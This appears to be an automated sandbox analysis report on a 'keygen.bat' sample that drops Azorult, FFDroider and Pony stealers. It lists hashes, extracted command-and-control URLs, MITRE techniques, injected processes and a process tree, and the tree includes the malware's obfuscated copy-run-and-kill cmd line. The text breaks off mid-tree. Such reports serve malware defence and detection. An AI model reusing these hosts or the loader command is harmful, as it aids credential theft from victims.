azorult | 798c35cdaf9d1be6b57310091bc555d2935ff8fdbe20eae5282986ea178c3348

Analysis

max time kernel
94s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-11-2024 08:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

keygen.bat
Size

175B
MD5

96969f73ab2c8e4be632cdbd0ead0760
SHA1

6f9a163ba4f938b063d24cd966af9b5abd8434fd
SHA256

04c2002de2cb5022e9c3b9325216ce74847f74166aa702eff6df01067930b49e
SHA512

261588c1e0a026be6ef3d35df77f52a5dc693c181be08d6c13110b59694497ec024fd751c54d3ca004312c02abb32c72ef61b824750eeccfe61c7f263ba1cab2

Score

10^/10

azorult ffdroider pony collection credential_access discovery infostealer rat spyware stealer trojan vmprotect

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

ffdroider

http://186.2.171.3

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider payload 3 IoCs

Processes:

resource	yara_rule
behavioral13/memory/1952-232-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider
behavioral13/memory/1952-240-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider
behavioral13/memory/1952-252-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider

Ffdroider family
ffdroider
Pony family
pony
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony

Executes dropped EXE 17 IoCs

Processes:

winnetdriv.exekey.exeKiffApp2.exeyCLcV_JUHy~2UXJ.ExEkey.exeCrack.exeCrack.exeGloryWSetp.exechrome3.exeGloryWSetp.exemd1_1eaf.exeInstall.exeInstall.tmpservices64.exeSetup.exeSetup.tmpsihost64.exe

pid	process
808	winnetdriv.exe
2304	key.exe
1812	KiffApp2.exe
1628	yCLcV_JUHy~2UXJ.ExE
2892	key.exe
1316	Crack.exe
2076	Crack.exe
2876	GloryWSetp.exe
2124	chrome3.exe
1624	GloryWSetp.exe
1952	md1_1eaf.exe
2636	Install.exe
1612	Install.tmp
2860	services64.exe
2716	Setup.exe
2372	Setup.tmp
2264	sihost64.exe

Loads dropped DLL 46 IoCs

Processes:

keygen-pr.exekeygen-step-4.execmd.exekey.exeregsvr32.exeCrack.exeGloryWSetp.exeInstall.exeInstall.tmpchrome3.exeSetup.exeSetup.tmpservices64.exe

pid	process
3028	keygen-pr.exe
2704	keygen-step-4.exe
3028	keygen-pr.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
3028	keygen-pr.exe
3028	keygen-pr.exe
2828	cmd.exe
2304	key.exe
2724	regsvr32.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
1316	Crack.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2876	GloryWSetp.exe
2876	GloryWSetp.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2636	Install.exe
1612	Install.tmp
1612	Install.tmp
1612	Install.tmp
2124	chrome3.exe
1612	Install.tmp
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2704	keygen-step-4.exe
2716	Setup.exe
2372	Setup.tmp
2372	Setup.tmp
2372	Setup.tmp
2860	services64.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe	vmprotect
behavioral13/memory/1952-231-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral13/memory/1952-232-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral13/memory/1952-240-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral13/memory/1952-252-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

key.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	key.exe

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

key.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	key.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

8 iplogger.org
9 iplogger.org
18 iplogger.org
27 iplogger.org
28 iplogger.org
61 raw.githubusercontent.com
62 raw.githubusercontent.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ip-api.com
38 ipinfo.io
40 ipinfo.io
Suspicious use of SetThreadContext 1 IoCs

Processes:

key.exe

description pid process target process

PID 2304 set thread context of 2892 2304 key.exe key.exe

flow	ioc
8	iplogger.org
9	iplogger.org
18	iplogger.org
27	iplogger.org
28	iplogger.org
61	raw.githubusercontent.com
62	raw.githubusercontent.com

flow	ioc
12	ip-api.com
38	ipinfo.io
40	ipinfo.io

description	pid	process	target process
PID 2304 set thread context of 2892	2304	key.exe	key.exe

Drops file in Program Files directory 3 IoCs

Processes:

Install.tmp

description	ioc	process
File created	C:\Program Files (x86)\AskFinder\unins000.dat	Install.tmp
File created	C:\Program Files (x86)\AskFinder\is-L9UBH.tmp	Install.tmp
File opened for modification	C:\Program Files (x86)\AskFinder\unins000.dat	Install.tmp

Drops file in Windows directory 2 IoCs

Processes:

keygen-step-3.exe

description ioc process

File created C:\Windows\winnetdriv.exe keygen-step-3.exe
File opened for modification C:\Windows\winnetdriv.exe keygen-step-3.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1652 952 WerFault.exe f785a9e.exe

description	ioc	process
File created	C:\Windows\winnetdriv.exe	keygen-step-3.exe
File opened for modification	C:\Windows\winnetdriv.exe	keygen-step-3.exe

pid	pid_target	process	target process
1652	952	WerFault.exe	f785a9e.exe

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

keygen-step-5.exekeygen-step-4.exetaskkill.exeCrack.exeSetup.tmpkeygen-step-1.exekeygen-step-3.execmd.exeGloryWSetp.exekey.exeyCLcV_JUHy~2UXJ.ExEkey.exeInstall.execmd.exewinnetdriv.exeSetup.exekeygen-pr.execmd.execmd.exePING.EXEregsvr32.exeInstall.tmpcmd.exekeygen-step-6.execmd.exeCrack.exemd1_1eaf.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GloryWSetp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yCLcV_JUHy~2UXJ.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnetdriv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-pr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	md1_1eaf.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

2684 cmd.exe
2968 PING.EXE
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2940 taskkill.exe

pid	process
2684	cmd.exe
2968	PING.EXE

pid	process
2940	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

services64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	services64.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2968 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2568 schtasks.exe
2844 schtasks.exe

pid	process
2968	PING.EXE

pid	process
2568	schtasks.exe
2844	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	43	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs

Processes:

keygen-pr.exekeygen-step-1.exekeygen-step-5.exekeygen-step-6.exekeygen-step-3.exekeygen-step-4.exe

pid process

3028 keygen-pr.exe
2168 keygen-step-1.exe
2340 keygen-step-5.exe
268 keygen-step-6.exe
2948 keygen-step-3.exe
2704 keygen-step-4.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

key.exechrome3.exeregsvr32.exeInstall.tmpservices64.exe

pid process

2304 key.exe
2304 key.exe
2124 chrome3.exe
2724 regsvr32.exe
1612 Install.tmp
1612 Install.tmp
2860 services64.exe

pid	process
2304	key.exe
2304	key.exe
2124	chrome3.exe
2724	regsvr32.exe
1612	Install.tmp
1612	Install.tmp
2860	services64.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

taskkill.exeKiffApp2.exekey.exeGloryWSetp.exechrome3.exeservices64.exe

description	pid	process
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	1812	KiffApp2.exe
Token: SeImpersonatePrivilege	2304	key.exe
Token: SeTcbPrivilege	2304	key.exe
Token: SeChangeNotifyPrivilege	2304	key.exe
Token: SeCreateTokenPrivilege	2304	key.exe
Token: SeBackupPrivilege	2304	key.exe
Token: SeRestorePrivilege	2304	key.exe
Token: SeIncreaseQuotaPrivilege	2304	key.exe
Token: SeAssignPrimaryTokenPrivilege	2304	key.exe
Token: SeImpersonatePrivilege	2304	key.exe
Token: SeTcbPrivilege	2304	key.exe
Token: SeChangeNotifyPrivilege	2304	key.exe
Token: SeCreateTokenPrivilege	2304	key.exe
Token: SeBackupPrivilege	2304	key.exe
Token: SeRestorePrivilege	2304	key.exe
Token: SeIncreaseQuotaPrivilege	2304	key.exe
Token: SeAssignPrimaryTokenPrivilege	2304	key.exe
Token: SeImpersonatePrivilege	2304	key.exe
Token: SeTcbPrivilege	2304	key.exe
Token: SeChangeNotifyPrivilege	2304	key.exe
Token: SeCreateTokenPrivilege	2304	key.exe
Token: SeBackupPrivilege	2304	key.exe
Token: SeRestorePrivilege	2304	key.exe
Token: SeIncreaseQuotaPrivilege	2304	key.exe
Token: SeAssignPrimaryTokenPrivilege	2304	key.exe
Token: SeImpersonatePrivilege	2304	key.exe
Token: SeTcbPrivilege	2304	key.exe
Token: SeChangeNotifyPrivilege	2304	key.exe
Token: SeCreateTokenPrivilege	2304	key.exe
Token: SeBackupPrivilege	2304	key.exe
Token: SeRestorePrivilege	2304	key.exe
Token: SeIncreaseQuotaPrivilege	2304	key.exe
Token: SeAssignPrimaryTokenPrivilege	2304	key.exe
Token: SeDebugPrivilege	1624	GloryWSetp.exe
Token: SeDebugPrivilege	2124	chrome3.exe
Token: SeDebugPrivilege	2860	services64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Install.tmp

pid process

1612 Install.tmp

pid	process
1612	Install.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exekeygen-step-5.exekeygen-step-3.exekeygen-pr.exekeygen-step-4.execmd.exeyCLcV_JUHy~2UXJ.ExEkey.exe

description	pid	process	target process
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 3028	2336	cmd.exe	keygen-pr.exe
PID 2336 wrote to memory of 2168	2336	cmd.exe	keygen-step-1.exe
PID 2336 wrote to memory of 2168	2336	cmd.exe	keygen-step-1.exe
PID 2336 wrote to memory of 2168	2336	cmd.exe	keygen-step-1.exe
PID 2336 wrote to memory of 2168	2336	cmd.exe	keygen-step-1.exe
PID 2336 wrote to memory of 2340	2336	cmd.exe	keygen-step-5.exe
PID 2336 wrote to memory of 2340	2336	cmd.exe	keygen-step-5.exe
PID 2336 wrote to memory of 2340	2336	cmd.exe	keygen-step-5.exe
PID 2336 wrote to memory of 2340	2336	cmd.exe	keygen-step-5.exe
PID 2336 wrote to memory of 268	2336	cmd.exe	keygen-step-6.exe
PID 2336 wrote to memory of 268	2336	cmd.exe	keygen-step-6.exe
PID 2336 wrote to memory of 268	2336	cmd.exe	keygen-step-6.exe
PID 2336 wrote to memory of 268	2336	cmd.exe	keygen-step-6.exe
PID 2336 wrote to memory of 2948	2336	cmd.exe	keygen-step-3.exe
PID 2336 wrote to memory of 2948	2336	cmd.exe	keygen-step-3.exe
PID 2336 wrote to memory of 2948	2336	cmd.exe	keygen-step-3.exe
PID 2336 wrote to memory of 2948	2336	cmd.exe	keygen-step-3.exe
PID 2336 wrote to memory of 2704	2336	cmd.exe	keygen-step-4.exe
PID 2336 wrote to memory of 2704	2336	cmd.exe	keygen-step-4.exe
PID 2336 wrote to memory of 2704	2336	cmd.exe	keygen-step-4.exe
PID 2336 wrote to memory of 2704	2336	cmd.exe	keygen-step-4.exe
PID 2340 wrote to memory of 2828	2340	keygen-step-5.exe	cmd.exe
PID 2340 wrote to memory of 2828	2340	keygen-step-5.exe	cmd.exe
PID 2340 wrote to memory of 2828	2340	keygen-step-5.exe	cmd.exe
PID 2340 wrote to memory of 2828	2340	keygen-step-5.exe	cmd.exe
PID 2948 wrote to memory of 808	2948	keygen-step-3.exe	winnetdriv.exe
PID 2948 wrote to memory of 808	2948	keygen-step-3.exe	winnetdriv.exe
PID 2948 wrote to memory of 808	2948	keygen-step-3.exe	winnetdriv.exe
PID 2948 wrote to memory of 808	2948	keygen-step-3.exe	winnetdriv.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 3028 wrote to memory of 2304	3028	keygen-pr.exe	key.exe
PID 2704 wrote to memory of 1812	2704	keygen-step-4.exe	KiffApp2.exe
PID 2704 wrote to memory of 1812	2704	keygen-step-4.exe	KiffApp2.exe
PID 2704 wrote to memory of 1812	2704	keygen-step-4.exe	KiffApp2.exe
PID 2704 wrote to memory of 1812	2704	keygen-step-4.exe	KiffApp2.exe
PID 2828 wrote to memory of 1628	2828	cmd.exe	yCLcV_JUHy~2UXJ.ExE
PID 2828 wrote to memory of 1628	2828	cmd.exe	yCLcV_JUHy~2UXJ.ExE
PID 2828 wrote to memory of 1628	2828	cmd.exe	yCLcV_JUHy~2UXJ.ExE
PID 2828 wrote to memory of 1628	2828	cmd.exe	yCLcV_JUHy~2UXJ.ExE
PID 2828 wrote to memory of 2940	2828	cmd.exe	taskkill.exe
PID 2828 wrote to memory of 2940	2828	cmd.exe	taskkill.exe
PID 2828 wrote to memory of 2940	2828	cmd.exe	taskkill.exe
PID 2828 wrote to memory of 2940	2828	cmd.exe	taskkill.exe
PID 1628 wrote to memory of 2884	1628	yCLcV_JUHy~2UXJ.ExE	cmd.exe
PID 1628 wrote to memory of 2884	1628	yCLcV_JUHy~2UXJ.ExE	cmd.exe
PID 1628 wrote to memory of 2884	1628	yCLcV_JUHy~2UXJ.ExE	cmd.exe
PID 1628 wrote to memory of 2884	1628	yCLcV_JUHy~2UXJ.ExE	cmd.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe
PID 2304 wrote to memory of 2892	2304	key.exe	key.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_win_path 1 IoCs

Processes:

key.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	key.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
  keygen-pr.exe -p83fsase3Ge
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Accesses Microsoft Outlook accounts
    - Accesses Microsoft Outlook profiles
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - outlook_win_path
    PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2892
- C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
  keygen-step-1.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2168
- C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe
  keygen-step-5.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /Q /C typE "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" > ..\yCLcV_JUHy~2UXJ.ExE && STaRT ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz & IF ""==""for %I IN ("C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ) do taskkill /iM "%~NxI" -F > nUl
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE
      ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
